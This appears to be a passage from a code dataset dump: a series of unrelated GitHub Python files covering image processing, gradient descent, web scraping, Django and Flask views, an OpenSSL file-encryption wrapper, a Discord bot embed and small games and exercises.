cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nfrom trainIDCard import *\r\nfrom genIDCard import *\r\n\r\n#image size: 1080, 1440, 3\r\ndef getSFZ(img,threshold_w = [15,1200],threshold_h = [0,200],threshold_data = [50,200],threshold_xmin=[400,1400],threshold_ymin=[800,1000]):\r\n \"\"\"\r\n 用于定位¥符号位置\r\n img : 原始cv读取的图像\r\n threshold_w : ¥宽度范围\r\n threshold_h : ¥高度范围\r\n threshold_xmin : ¥出现的位置范围\r\n \"\"\"\r\n img_gray = img[:,:,0]\r\n ret, binary = cv2.threshold(img_gray,115,255,cv2.THRESH_BINARY)\r\n cnts, hierarchy = cv2.findContours(binary.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n positions = []\r\n for index,c in enumerate(cnts):\r\n x,y,w,h = cv2.boundingRect(c)\r\n xmin,ymin,xmax,ymax = x,y,x+w,y+h\r\n if threshold_xmin[0]1e-14 :\n count=count+1\n step=gradient(*state)\n state=state-0.1*step\n error_value[0]=error(*state)\n return state,count\n\ndef coord_descent():\n state=np.array([1,1],dtype=np.float128)\n count=0\n error_value=np.array([1],dtype=np.float128)\n while count<15:\n count=count+1\n\n step1x,step1y=gradient(*state)\n state=state-0.1*np.array([step1x,0],dtype=np.float128)\n step2x,step2y=gradient(*state)\n state=state-0.1*np.array([0,step2y],dtype=np.float128)\n error_value[0]=error(*state)\n return error_value 
\n","repo_name":"bbli/CS156-Code","sub_path":"Gradient-Descent/GradDescent.py","file_name":"GradDescent.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11553475765","text":"from bs4 import BeautifulSoup, SoupStrainer\nfrom collections import deque\nfrom pathlib import Path\n\nclass Page():\n \"\"\"\n Object organizing the link information in the archeaopteryx pages\n \"\"\"\n\n def __init__(self, path):\n \"\"\"\n instance variables:\n name -- file name with extension\n page_type -- home, about, archive or article\n ing_home -- link anchored to the archeaopteryx image\n home -- link anchored to 'home' in the menu bar\n archive -- link anchored to 'archive' in the menu bar\n about -- link anchored to 'about' in the menu bar\n rss -- link anchored to 'rss' in the menu bar\n \"\"\"\n self.name = path.name\n self.page_type = self.get_page_type(self.name)\n self.img_home, self.home, self.archive, self.about, self.rss = self.get_header_links(path)\n\n def get_page_type(self, name):\n '''\n Return if page is home, about, archive, or an article\n '''\n dict = {\"index.html\": \"home\", \"about.html\": \"about\", \"archive.html\": \"archive\"}\n return dict.get(name, \"article\")\n\n def get_header_links(self, path):\n only_header = SoupStrainer(\"header\")\n dict = {\"img_home\": \"archea-container\", \"home\": \"home\", \"archive\": \"archive\", \"about\": \"about\", \"rss\": \"rss\"}\n with open(path) as f:\n soup = BeautifulSoup(f, \"html.parser\", parse_only=only_header)\n for key in dict:\n div = soup.find('div', dict[key])\n if not div is None:\n try:\n anchor = next(div.children)\n dict[key] = anchor.get('href')\n except StopIteration:\n dict[key] = None\n else:\n dict[key] = None\n links = (dict[\"img_home\"], dict[\"home\"], dict[\"archive\"], dict[\"about\"], dict[\"rss\"])\n return links\n\n\nclass ArticlePage(Page):\n \"\"\"\n Extends Page class to include Navigation links and header ids\n \"\"\"\n\n def __init__(self, path):\n \"\"\"\n instance variables:\n nav_refs -- deque of all links in the navigation bar\n header_ids -- deque of all ids in h1, h2 and h3 elements\n\n other instance variables inherited from Page class\n \"\"\"\n self.nav_refs = self.get_nav_links(path)\n self.header_ids = self.get_h_ids(path)\n Page.__init__(self, path)\n\n\n def get_nav_links(self, path):\n only_toc = SoupStrainer('li')\n nav_refs = deque()\n with open(path) as f:\n soup = BeautifulSoup(f, 'html.parser', parse_only=only_toc)\n anchor_list = soup.find_all('a')\n for anchor in anchor_list:\n nav_refs.append(anchor.get('href'))\n return nav_refs\n\n def get_h_ids(self, path):\n only_headers = SoupStrainer(['h1', 'h2', 'h3', 'h4'])\n header_ids = deque()\n with open(path) as f:\n soup = BeautifulSoup(f, 'html.parser', parse_only=only_headers)\n for ref in soup:\n if ref.string == \"Contents:\":\n continue\n id = ref.get('id')\n id = \"#\" + str(id)\n header_ids.append(id)\n return header_ids\n\n\n\nclass ArchivePage(Page):\n\n def __init__(self, path):\n self.article_links = self.get_article_links(path)\n Page.__init__(self, path)\n\n def get_article_links(self, path):\n only_article_links = SoupStrainer('li', {'class':\"archive-li\"} )\n article_links = deque()\n with open(path) as f:\n soup = BeautifulSoup(f, 'html.parser', parse_only=only_article_links)\n for ref in soup:\n try:\n anchor = next(ref.children)\n article_links.append(anchor.get('href'))\n except StopIteration:\n pass\n return 
article_links\n","repo_name":"archeaopteryx/archeaopteryx.github.io","sub_path":"tests/pageObjects.py","file_name":"pageObjects.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25365783866","text":"# -*- coding: utf-8-sig -*-\n\"\"\"\nFile Name : get_amazon_cookies\nAuthor : Eric\nCreate date : 2020/11/27\n\"\"\"\nfrom Amazon.ArriveDate.bin.mongo_config import *\nfrom Amazon.ArriveDate.settings.settings import *\nfrom Amazon.ArriveDate.bin.start_chrome_drive import *\nfrom Amazon.ArriveDate.functions.change_postal_code import *\nimport pandas as pd\nimport random\nimport time\nimport re\n\n\ndef update_us_selenium_cookies():\n    '''\n    Randomly pick an ASIN and a US city postal code, then update the Amazon US-site cookies stored in the online database\n    '''\n    c_date = get_current_date()\n    cookie_db_col = hs_mongo_config(col_name=us_cookie_col_name_prefix + c_date, db_name=us_cookie_db_name)\n    postal_code_col = hs_mongo_config(col_name=us_postal_code_col,db_name=us_cookie_db_name)\n    asin_list = pd.DataFrame(hs_mongo_config(col_name=us_url_check_asin,db_name=us_cookie_db_name).find())['ASIN'].tolist()\n    postal_code_list = pd.DataFrame(postal_code_col.find())[\"PostalCode\"].tolist()\n\n    for i in range(update_cookie_num):\n        driver = switch_to_browser(img_load=chrome_load_imd, headless=False)\n        asin = random.choice(asin_list)\n        url = r'https://www.amazon.com/dp/' + asin\n        driver.get(url)\n        time.sleep(2)\n        change_postal_code(driver,random.choice(postal_code_list))\n        time.sleep(3)\n        cookies = driver.get_cookies()\n        save_to_mongo(cookie_db_col,{'cookie':cookies})\n        driver.quit()\n\n\ndef get_postal_code_list():\n    postal_code_col = hs_mongo_config(col_name=us_postal_code_col, db_name=us_cookie_db_name)\n    postal_code_list = pd.DataFrame(postal_code_col.find())[\"PostalCode\"].tolist()\n    return postal_code_list\n\n\ndef select_latest_us_cookies_col():\n    '''\n    Find the cookie collection that was updated most recently\n    '''\n    us_cookie_db = hs_db_info(us_cookie_db_name)\n    col_list = us_cookie_db.collection_names()\n    date_list = []\n    for collec in col_list:\n        if not re.match(us_cookie_col_name_prefix,collec): continue\n        date_list.append(int(re.search(us_cookie_col_name_suffix_pattern,collec).group()))\n    return us_cookie_col_name_prefix + str(max(date_list))\n\n\ndef get_us_cookies():\n    '''Get one random Amazon US-site cookie'''\n    col_name = select_latest_us_cookies_col()\n    db_col = hs_mongo_config(db_name=us_cookie_db_name,col_name=col_name)\n    cookies_list = pd.DataFrame(db_col.find())['cookie'].tolist()\n    return random.choice(cookies_list)\n\ndef get_us_cookie_list():\n    '''Return the list of Amazon US-site cookies'''\n    col_name = select_latest_us_cookies_col()\n    db_col = hs_mongo_config(db_name=us_cookie_db_name, col_name=col_name)\n    cookies_list = pd.DataFrame(db_col.find())['cookie'].tolist()\n    return cookies_list\n\nif __name__ == '__main__':\n    # update_us_selenium_cookies()\n    print(select_latest_us_cookies_col())","repo_name":"Eric-top1cn/AmazonSpider","sub_path":"ArriveDate/functions/update_us_amazon_cookies.py","file_name":"update_us_amazon_cookies.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12474566883","text":"from django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import MyUserCreationForm, UserDetailForm\n\n\ndef register(request):\n    if 
request.method == 'POST':\n form = MyUserCreationForm(request.POST, prefix='uf')\n user_detail_form = UserDetailForm(request.POST, prefix='ud')\n\n if form.is_valid() and user_detail_form.is_valid():\n # check if phone number already exists\n phone_number = user_detail_form.cleaned_data['phone_number']\n if User.objects.filter(username=phone_number).exists():\n messages.info(request, 'This phone number has already been used. Please provide an alternate phone number.', extra_tags='alert alert-info alert-dismissible')\n return render(request, 'account/register.html', {'form': form, 'user_detail_form': user_detail_form})\n\n new_user = form.save(commit=False)\n new_user.username = phone_number\n new_user.save()\n user_detail_form.save(new_user)\n messages.info(request, 'You have been registered on this portal. Login to continue.', extra_tags='alert alert-info alert-dismissible')\n return redirect('account:login')\n else:\n form = MyUserCreationForm(prefix='uf')\n user_detail_form = UserDetailForm(prefix='ud') # form to collect additional information from the user\n return render(request, 'account/register.html', {'form': form, 'user_detail_form': user_detail_form})\n\n\ndef logout_view(request):\n logout(request)\n return redirect('home')\n","repo_name":"simplywhiz/PaydeskGit","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21100390683","text":"'''\nAuthor: Jason\nDate: 2023-07-28 10:10:33\nLastEditors: Jason\nLastEditTime: 2023-08-02 08:30:21\nFilePath: file_encryption/encryption.py\n'''\n\nimport os\nimport sys\nimport datetime\nimport subprocess\n\nbase_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))\nssl_exe_path = os.path.join(base_path, 'openssl-3', 'x86/bin/openssl.exe')\n\ndef finish_func():\n print(\"----------------------------------------------------\\n\")\n input(\"按任意键退出...\")\n exit(0)\n\ndef print_errinfo(cmd, result):\n if cmd: print(f\"\\033[0;31m 命令: {' '.join(cmd)} \\033[0m\")\n print(f\"\\033[0;31m 错误信息: {result.stderr} \\033[0m\")\n finish_func()\n\ndef add_privkey():\n args = [ssl_exe_path, 'genrsa', '-out', 'rsa_private_key.pem', '2048']\n result = subprocess.run(args, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 生成私钥文件失败! \\033[0m\")\n print_errinfo(result=result)\n return True\n\ndef add_pubkey():\n args = [ssl_exe_path, 'rsa', '-in', 'rsa_private_key.pem', '-pubout', '-out', 'rsa_public_key.pem']\n result = subprocess.run(args, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 生成公钥文件失败! \\033[0m\")\n print_errinfo(result=result)\n return True\n\ndef fix_input(file_path, key_path):\n if file_path == \"key.bin.enc\":\n temp_file_path = file_path\n file_path = key_path\n key_path = temp_file_path\n return file_path, key_path\n\ndef encrypt_file(file_path):\n print(f\"\\033[0;32m 正在加密文件:{file_path} \\033[0m\")\n create_key = [ssl_exe_path, 'rand', '-base64', '32']\n result = subprocess.run(create_key, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 生成随机密钥失败! 
\\033[0m\")\n print_errinfo(result=result)\n key = result.stdout\n with open('key.bin', 'w') as f:\n f.write(key)\n\n cmd1 = [ssl_exe_path, 'enc', '-aes-256-cbc', '-salt', '-in', file_path, '-out', file_path + '.enc', '-pass', 'file:./key.bin']\n cmd2 = [ssl_exe_path, 'pkeyutl', '-encrypt', '-inkey', './rsa_public_key.pem', '-pubin', '-in', './key.bin', '-out', 'key.bin.enc']\n for cmd in [cmd1, cmd2]:\n result = subprocess.run(cmd, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 命令执行失败! \\033[0m\")\n print_errinfo(cmd, result)\n os.remove('key.bin')\n print(f\"\\033[0;32m 加密文件成功! \\033[0m\")\n\ndef decrypt_file(file_path, key_path):\n print(f\"\\033[0;32m 正在解密文件:{file_path} \\033[0m\")\n fix_input(file_path, key_path)\n file_name = file_path[:-4]\n cmd1 = [ssl_exe_path, 'pkeyutl', '-decrypt', '-inkey', './rsa_private_key.pem', '-in', key_path, '-out', 'key.bin']\n cmd2 = [ssl_exe_path, 'enc', '-d', '-aes-256-cbc', '-in', file_path, '-out', file_name, '-pass', 'file:./key.bin']\n for cmd in [cmd1, cmd2]:\n result = subprocess.run(cmd, capture_output=True, text=True)\n if result.returncode != 0:\n print(f\"\\033[0;31m 命令执行失败! \\033[0m\")\n print_errinfo(cmd, result)\n os.remove('key.bin')\n print(f\"\\033[0;32m 解密文件成功! \\033[0m\")\n\ndef keys_info():\n priv_mtime = os.path.getmtime('rsa_private_key.pem')\n priv_size = os.path.getsize('rsa_private_key.pem')\n priv_ctime = datetime.datetime.fromtimestamp(priv_mtime).strftime(\"%Y-%m-%d %H:%M:%S\")\n pub_mtime = os.path.getmtime('rsa_public_key.pem')\n pub_size = os.path.getsize('rsa_public_key.pem')\n pub_ctime = datetime.datetime.fromtimestamp(pub_mtime).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n print(f\"\\033[0;34m 私钥文件大小:{priv_size} ,创建日期:{priv_ctime} \\033[0m\")\n print(f\"\\033[0;34m 公钥文件大小:{pub_size} ,创建日期:{pub_ctime} \\033[0m\")\n\ndef modify_keys():\n if not os.path.isfile('rsa_private_key.pem') or input('是否重新生成私钥?(y/n)') == 'y':\n add_privkey()\n print(f\"\\033[0;32m 私钥文件已生成! \\033[0m\")\n\n add_pubkey()\n print(f\"\\033[0;32m 公钥文件已生成! \\033[0m\")\n keys_info()\n\n finish_func()\n\ndef check_keys():\n if not os.path.isfile('rsa_public_key.pem') or not os.path.isfile('rsa_private_key.pem'):\n print(\"检测到密钥文件不存在,正在生成密钥文件...\")\n modify_keys()\n else:\n print(\"----------------------------------------------------\\n\\\n文件加解密工具\\n\\\n使用方法:\\n\\\n将需要加解密的文件拖拽到本程序图标中,即可完成加解密\\n\\\n直接运行将检测密钥文件是否存在,不存在则将生成\\n\\\n----------------------------------------------------\\n\")\n keys_info()\n if input('----------------------------------------------------\\n\\\n检测到密钥文件存在,是否重新生成?(y/任意退出)') == 'y':\n modify_keys()\n exit(0)\n\ndef check_files(model):\n if model == 'encrypt' and not os.path.isfile('rsa_public_key.pem'):\n print(f\"\\033[0;31m 公钥文件不存在! \\033[0m\")\n finish_func()\n elif model == 'decrypt' and not os.path.isfile('rsa_private_key.pem'):\n print(f\"\\033[0;31m 私钥文件不存在! 
\\033[0m\")\n finish_func()\n\ndef check_model():\n if len(sys.argv) == 1:\n check_keys()\n elif len(sys.argv) == 2:\n check_files(\"encrypt\")\n encrypt_file(sys.argv[1])\n else:\n check_files(\"decrypt\")\n decrypt_file(sys.argv[1], sys.argv[2])\n\ncheck_model()\n ","repo_name":"Jason824040945/encryption","sub_path":"encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73894392783","text":"from typing import Union, List, Dict\n\nfrom discord import Embed\n\nfrom config import (\n COMMAND_PREFIX,\n GCE_TARGET_INSTANCE_ZONE\n)\nfrom src.discord.embed.factory.base.gce import GCEEmbedFactoryBase\nfrom src.discord.embed.util.create_embed import create_embed\nfrom src.gce.type.instance import GCEInstanceRepresentingWrapper\n\n\nclass InstanceListEmbedFactory(GCEEmbedFactoryBase):\n def __init__(\n self,\n instances: List[GCEInstanceRepresentingWrapper],\n zone: str = GCE_TARGET_INSTANCE_ZONE\n ):\n self.__instances: List[GCEInstanceRepresentingWrapper] = instances\n self.__zone: str = zone\n\n def _get_fields(self) -> List[Dict[str, Union[str, bool]]]:\n fields: List[Dict[str, Union[str, bool]]] = list()\n\n for instance in self.__instances:\n fields.append(\n {\n \"name\": f\"{instance.get_status_icon()}: `{instance.name}`\",\n \"value\": f\"**{instance.status}**\",\n \"inline\": False\n }\n )\n\n return fields\n\n def make(self) -> Embed:\n FOOTER: str = f\"`{COMMAND_PREFIX}\" \" \" \"{start | stop} ${instance_name}\" \"` \" \"でインスタンスを操作できます\"\n\n title: str = f'\"{self.__zone}\" にあるインスタンスの一覧'\n fields: List[Dict[str, Union[str, bool]]] = self._get_fields()\n\n embed = create_embed(\n title=title,\n color=self._EMBED_COLOR,\n author_name=self._AUTHOR_NAME,\n author_url=self._AUTHOR_URL,\n author_icon_url=self._AUTHOR_ICON_URL,\n thumbnail_url=self._THUMBNAIL_URL,\n footer=FOOTER,\n fields=fields\n )\n\n return embed\n","repo_name":"Colk-tech/gcpdiscord","sub_path":"src/discord/embed/factory/instance_list.py","file_name":"instance_list.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"25602245705","text":"###############################################################################\n# For when your barcodes correspond to the wrong samples!\n#\n# Make sure this is executed from the run directory.\n#\n# Ensure the input file is named \"sample_data.txt\" and is in the same\n# directory, with 4 tab-separated columns corresponding to:\n# 0: old sample number\n# 1: new sample number\n# 2: old sample name\n# 3: new sample name\n\nimport os\nimport subprocess\nimport re\nimport sys\n\nimport dir_tools\n\n\ndef mv_rename(old, new):\n try:\n subprocess.check_call([\"mv\",\n old,\n new])\n except:\n log(old + \" name not changed\")\n\n log(old + \" renamed to \" + new)\n\n\n# error logging\ndef log(message):\n with open(os.path.join('./', 'renaming_log.txt'), 'a') as datafile:\n datafile.write(message + \"\\n\")\n datafile.close()\n\n\n# Reads the input sample information and creates a dictionary for both sample\n# names and sample numbers separately.\ndef read_dicts():\n sample_names = dict()\n sample_nums = dict()\n\n with open(os.path.join('./', 'sample_data.txt'), 'r') as datafile:\n for line in datafile:\n line_list = line.split(\"\\t\")\n sample_nums[line_list[0]] = line_list[1]\n sample_names[line_list[2]] = line_list[3].strip(\"\\n\")\n 
datafile.close()\n\n return (sample_names, sample_nums)\n\n\ndef main():\n\n (sample_names, sample_nums) = read_dicts()\n\n if sample_names and sample_nums:\n print(\"dictionary populated.\")\n\n run = dir_tools.get_run_info(sys.argv)\n\n for dirname in os.listdir(run[\"path\"]):\n # To check it is dir, not file\n if os.path.isdir(run[\"path\"] + dirname):\n bcpath = (run[\"path\"] + dirname +\n \"/Data/Intensities/BaseCalls/\")\n\n # Matching sample name for renaming directory and FastQ files\n # Assumes Illumina numeric ID is at least 8 digits long\n name_re = re.match(r\"([\\S*\\s*]*[A|B])-\\d\\d\\d\\d\\d\\d\\d\\d+\\Z\",\n dirname)\n old_sample_name = \"\"\n\n for filename in os.listdir(bcpath):\n # Renaming FastQ files (sample name and number)\n num_re = re.match(r\"\\S*_S(\\d+)\\S*\",\n filename)\n\n if name_re:\n old_sample_name = name_re.group(1)\n old_num = num_re.group(1)\n\n new_sample_name = sample_names.get(old_sample_name)\n new_num = sample_nums.get(old_num)\n\n new_fastq = re.sub(\n r\"([\\S*\\s*]*)(_S)(\\d+)(_L001_R\\d+_001.fastq.gz)\\Z\",\n new_sample_name + r\"\\g<2>\" + str(new_num) +\n r\"\\g<4>\",\n filename)\n\n if filename != new_fastq:\n mv_rename(bcpath + filename,\n bcpath + new_fastq)\n\n else:\n log(dirname + \" name not changed\")\n\n # Renaming directory (sample name)\n if name_re:\n old_name = name_re.group(1)\n new_name = sample_names.get(old_name)\n\n new_dirname = re.sub(\n r\"([\\S*\\s*]*[A|B])(-\\d\\d\\d\\d\\d\\d\\d\\d+)\\Z\",\n new_name + r\"\\g<2>\",\n dirname)\n\n if dirname != new_dirname:\n mv_rename(run[\"path\"] + dirname,\n run[\"path\"] + new_dirname)\n\n else:\n log(dirname + \" name not changed\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"agutteridge/bioinformatics_bits","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"819173408","text":"from app import mysql\nfrom flask import flash\nfrom werkzeug.utils import secure_filename\nimport os\nfrom cloudinary import uploader\nfrom config import CLOUDINARY_FOLDER\n\nclass student_model:\n @classmethod\n def add_student(cls, id, firstname, lastname, course, year, gender, image_url):\n try:\n cur = mysql.new_cursor(dictionary=True)\n\n # Check if the ID is already taken\n cur.execute(\"SELECT id FROM student WHERE id = %s\", (id,))\n existing_id = cur.fetchone()\n if existing_id:\n flash(\"ID is already taken.\", \"error\")\n return \"Failed to create student\"\n\n # Insert the new student record\n cur.execute(\"INSERT INTO student (id, firstname, lastname, course, year, gender, image_url) VALUES (%s, %s, %s, %s, %s, %s, %s)\",\n (id, firstname, lastname, course, year, gender, image_url))\n mysql.connection.commit()\n \n return \"Student created successfully\"\n \n except Exception as e:\n flash(\"Failed to create student(models 1).\", \"error\")\n return \"Failed to create student\"\n \n @classmethod\n def upload_image(cls,image):\n try:\n # Check if the file has an allowed extension\n allowed_extensions = {'png', 'jpg', 'jpeg'}\n if '.' 
in image.filename and image.filename.rsplit('.', 1)[1].lower() in allowed_extensions:\n # Check if the file size is 1MB or less\n max_file_size_mb = 1.0\n max_file_size_bytes = max_file_size_mb * 1024 * 1024 # 1MB = 1024KB = 1024 * 1024 bytes\n\n if len(image.read()) <= max_file_size_bytes:\n # Reset the file pointer to the beginning for uploading\n image.seek(0)\n\n # Generate a secure filename\n filename = secure_filename(image.filename)\n\n # Upload the file to Cloudinary\n response = uploader.upload(image, folder=CLOUDINARY_FOLDER) # Set the folder as needed\n\n # Return the Cloudinary URL of the uploaded image\n return response['secure_url']\n else:\n flash(\"File size exceeds the maximum allowed limit (1MB).\", \"error\")\n return None\n else:\n flash(\"Invalid file type. Please upload a valid image file (allowed types: png, jpg, jpeg).\", \"error\")\n return None\n\n except Exception as e:\n flash(\"Failed to upload image. Please try again.\", \"error\")\n return None\n \n @classmethod\n def get_students(cls):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT s.*, col.name AS college_name, col.code AS college_code FROM student s JOIN course c ON s.course = c.code INNER JOIN college col ON c.college = col.code\")\n course = cur.fetchall()\n return course\n \n @classmethod\n def search_students_by_id(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE id LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_firstname(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE firstname LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_lastname(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE lastname LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_course(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE course LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_year(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE year LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n\n @classmethod\n def search_students_by_gender(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE gender LIKE %s\", (f\"%{search_query}%\",))\n students = cur.fetchall()\n cur.close()\n return students\n \n @classmethod\n def search_students_by_college(cls, search_query):\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT s.*, col.name AS college_name, col.code AS college_code FROM student s JOIN course c ON s.course = c.code INNER JOIN college col ON c.college = col.code WHERE c.college = %s\", (search_query,))\n students = cur.fetchall()\n cur.close()\n return students\n \n @classmethod\n def update_student(cls, student_id, new_id, new_firstname, new_lastname, new_course, new_year, new_gender, new_image_url):\n try:\n cur = mysql.new_cursor(dictionary=True)\n\n # Check if the new ID is already taken (excluding the current student's ID)\n cur.execute(\"SELECT id FROM student 
WHERE id = %s AND id != %s\", (new_id, student_id))\n existing_id = cur.fetchone()\n if existing_id:\n flash(\"ID is already taken.\", \"error\")\n return \"Failed to update student\"\n\n # Update the student record\n cur.execute(\"UPDATE student SET id=%s, firstname=%s, lastname=%s, course=%s, year=%s, gender=%s, image_url=%s WHERE id=%s\",\n (new_id, new_firstname, new_lastname, new_course, new_year, new_gender, new_image_url, student_id))\n mysql.connection.commit()\n return \"Student updated successfully\"\n except Exception as e:\n return \"Failed to update student\"\n\n @classmethod\n def get_student_by_id(cls, student_id):\n try:\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"SELECT * FROM student WHERE id = %s\", (student_id,))\n student = cur.fetchone()\n cur.close()\n return student\n except Exception as e:\n flash(\"Failed to get student by ID.\", \"error\")\n return None\n \n @classmethod\n def delete_student(cls, student_id):\n try:\n cur = mysql.new_cursor(dictionary=True)\n cur.execute(\"DELETE FROM student WHERE id = %s\", (student_id,))\n mysql.connection.commit()\n cur.close()\n return {\"success\": True, \"message\": \"Course deleted successfully\"}\n except Exception as e:\n return {\"success\": False, \"message\": str(e)}","repo_name":"lalalance12/SSIS-Website","sub_path":"app/models/student_m.py","file_name":"student_m.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41704752334","text":"class Player:\n \"\"\"A class of a citizen player.\n\n Args:\n name (str): The name of the player in the Telegram.\n userid (int): The userid of the player in the Telegram.\n\n Attributes:\n name (str): The name of the player in the Telegram.\n _is_alive (bool): If the player is still alive.\n _role (str): The role of the player in the game.\n userid (int): The userid of the player in the Telegram.\n _voted (bool): If the player had already voted in this turn.\n \"\"\"\n def __init__(self, name: str, userid: int):\n self.name: str = name\n self._is_alive: bool = True\n self._role: str = 'citizen'\n self.userid: int = userid\n self._voted: bool = False\n self._emoji: str = '\\U0001F477'\n\n def __str__(self):\n return f'{self.name}, {self._role} {self._emoji}'\n\n\nclass Murderer(Player):\n def __init__(self, name: str, userid: int):\n super().__init__(name, userid)\n self._role: str = 'murderer'\n self._detained: bool = False\n self._emoji: str = '\\U0001F9DB'\n\n @staticmethod\n def kill(player: Player) -> None:\n \"\"\"Kill a player.\"\"\"\n player._is_alive = False\n\n\nclass Policeman(Player):\n def __init__(self, name: str, userid: int):\n super().__init__(name, userid)\n self._role: str = 'policeman'\n self._emoji: str = '\\U0001F46E'\n\n @staticmethod\n def detain(player: Player) -> bool:\n \"\"\"Check if the detained player is the murderer.\"\"\"\n if isinstance(player, Murderer):\n player._detained = True\n return True\n return False\n","repo_name":"orronai/burningtown","sub_path":"models/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5771613980","text":"import re\r\n\r\n\r\ndef get_counts(filename):\r\n line_count = 0\r\n word_count = 0\r\n with open(filename, \"r\") as f:\r\n line = f.readline()\r\n while line != \"\":\r\n line_count += 1\r\n word_count += len(re.findall(r'\\w+', line))\r\n line = f.readline()\r\n\r\n 
return line_count, word_count\r\n\r\n\r\n# Driver code\r\nfilename = input(\"Enter file name: \")\r\nline_count, word_count = get_counts(filename)\r\nprint(\"number of lines: \", line_count)\r\nprint(\"number of words: \", word_count)\r\n","repo_name":"naveensakthi04/PythonTraining","sub_path":"Exercise2/2_count_words_lines.py","file_name":"2_count_words_lines.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23378575949","text":"\"\"\"A two-dimensional array is given:\r\n\r\n    square = np.array([ [16, 3, 2, 13],\r\n                    [5, 10, 11, 8],\r\n                    [9, 6, 7, 12],\r\n                    [4, 15, 14, 1]])\r\n    Compute the sum of the numbers in each column, in each row, and in each 2×2 square\r\n    that can be cut out of the given one (5 of them). Print it to the screen for each case.\"\"\"\r\nimport numpy as np\r\nArray=np.array([ [16, 3, 2, 13], [5, 10, 11, 8],[9, 6, 7, 12],[4, 15, 14, 1]])\r\nrows,cols =Array.shape\r\nsum_rows=[]\r\ndef sum_cols_and_rows(array):\r\n    a = 0\r\n    ss=0\r\n    for i in range(rows): # function that calculates the sum of row or column elements\r\n        aa=array[i,:]\r\n        for j in range(cols):\r\n            ss+=aa[j]\r\n        sum_rows.append(ss)\r\n        ss=0\r\n    print('sum of rows or columns is ',sum_rows)\r\n    sum_rows.clear()\r\nTArray=Array.transpose()\r\nsum_cols_and_rows(Array)\r\nsum_cols_and_rows(TArray)\r\nsq1=Array[0:2,0:2]\r\nsq2=Array[0:2,2:4]\r\nsq3=Array[2:4,0:2]\r\nsq4=Array[2:4,2:4]\r\nsq5=Array[1:3,1:3]\r\n\r\ndef sum_all_el(array):\r\n    x=0\r\n    for i in range(2):\r\n        for j in range(2):\r\n            x+=int(array[i,j])\r\n    print(x)\r\n    x=0\r\nsum_all_el(sq1)\r\nsum_all_el(sq2)\r\nsum_all_el(sq3)\r\nsum_all_el(sq4)\r\nsum_all_el(sq5)\r\n\r\n\r\n\r\n\r\n","repo_name":"lazyrka/lazyrkindom","sub_path":"spring/lab3/3.3.py","file_name":"3.3.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15842054142","text":"import pygame\nimport sys\nimport random\nfrom pygame.locals import *\n\n# colors\nWHITE = (255,255,255)\nBLACK = (0,0,0)\n\ndef draw_btns (BUTTONS):\n    for button ,letter in BUTTONS:\n        btn_text = btn_font.render(letter, True, 